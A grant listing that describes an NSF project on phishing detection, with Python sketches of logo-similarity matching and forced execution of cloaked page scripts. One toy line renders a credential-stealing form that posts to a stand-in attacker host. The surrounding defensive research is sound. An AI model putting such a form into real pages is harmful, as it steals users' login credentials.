CAREER: Defending Against Phishing Attacks beyond Reference-Based System

NSF

About This Grant

Phishing attacks are a major cybersecurity threat affecting billions of Internet users worldwide. In these attacks, cybercriminals fabricate websites that mimic legitimate ones to trick users into revealing sensitive information such as login credentials. In response to escalating phishing threats, researchers have turned to machine learning and deep learning for detection, with recent focus on "reference-based visual similarity models" that compare visual elements of a suspect page, such as logos and login forms, against those of known legitimate sites. This approach has two critical flaws. First, it lacks resilience against evolving evasion tactics that can effectively bypass phishing detectors. Second, countering those tactics requires substantial human effort: identifying vulnerabilities, curating ground-truth datasets, retraining models, and evaluating the updated models. The result is a window of vulnerability between the emergence of a new attack tactic and the deployment of an updated model.

This project strengthens protection against phishing by developing detection approaches that improve resilience and reduce human effort, using forced execution of unexposed program elements and large language models (LLMs). The work addresses the two weaknesses above through a dual approach. First, the project team conducts a systematic evaluation of state-of-the-art detection models to identify exploitable weaknesses and fundamental flaws. Second, building on these insights, the team develops two novel detection mechanisms: a JavaScript forced-execution technique that reduces dependence on reference-based visual elements, and an LLM-based system that both narrows the temporal gap between new attack vectors and defensive updates and provides users with contextual semantic information for better threat assessment.

Beyond incremental security improvements, the project establishes more resilient, autonomous detection systems that minimize human oversight while enhancing protective capabilities, simultaneously advancing the research community's theoretical understanding of phishing methodologies and delivering practical defenses against increasingly sophisticated social engineering threats. This award reflects NSF's statutory mission and has been deemed worthy of support through evaluation using the Foundation's intellectual merit and broader impacts review criteria.
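To make the reference-based idea concrete, here is a minimal sketch of how such a detector decides: if a page's logo closely matches a known brand's logo but the page is served from a domain outside that brand's allow-list, the page is flagged. The brand name, domain, embedding vectors, and threshold below are all hypothetical; real systems derive embeddings from a trained vision model rather than hand-written lists.

```python
from math import sqrt

def cosine(a, b):
    """Cosine similarity between two embedding vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (sqrt(sum(x * x for x in a)) * sqrt(sum(x * x for x in b)))

# Hypothetical reference set: brand -> (logo embedding, legitimate domains).
REFERENCES = {
    "ExampleBank": ([0.9, 0.1, 0.3], {"examplebank.com"}),
}

def classify(page_domain, logo_embedding, threshold=0.85):
    """Flag a page as phishing if its logo matches a known brand's logo
    while the page is hosted outside that brand's legitimate domains."""
    for brand, (ref_emb, domains) in REFERENCES.items():
        if cosine(logo_embedding, ref_emb) >= threshold and page_domain not in domains:
            return ("phishing", brand)
    return ("benign", None)
```

The evasion problem the abstract describes follows directly from this design: an attacker who perturbs the logo enough to fall below the similarity threshold, or hides it from the crawler entirely, slips past the check.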
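The forced-execution idea can likewise be sketched in miniature. Phishing pages often "cloak": their JavaScript only emits the credential-stealing form when it believes a real victim, not a security crawler, is visiting. Forced execution sidesteps the guard by running every branch outcome and collecting all content that could ever be rendered. The page function and URL below are invented stand-ins, and the branch space here is a single boolean; a real engine forces branches inside an actual JavaScript interpreter.

```python
def render_page(is_real_user):
    """Toy stand-in for cloaked page logic: the malicious form is only
    emitted when the script decides a real victim is visiting."""
    if is_real_user:
        return ["<form action='https://evil.example/steal'>", "password field"]
    return ["<p>Under construction</p>"]

def forced_execution(page_fn):
    """Run the page logic under every branch outcome and union the observed
    content, so cloaked elements cannot stay hidden from the analyzer."""
    observed = set()
    for outcome in (True, False):
        observed.update(page_fn(outcome))
    return observed
```

Because the analyzer sees the union of all branches, the stolen-credential endpoint surfaces even when the crawler would normally be served the benign "under construction" view, which is what lets this technique reduce reliance on visual reference elements.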

Focus Areas

machine learning, engineering, social science

Eligibility

university, nonprofit, small business

Funding Range

Up to $349K

Deadline

2030-06-30

Complexity

Medium
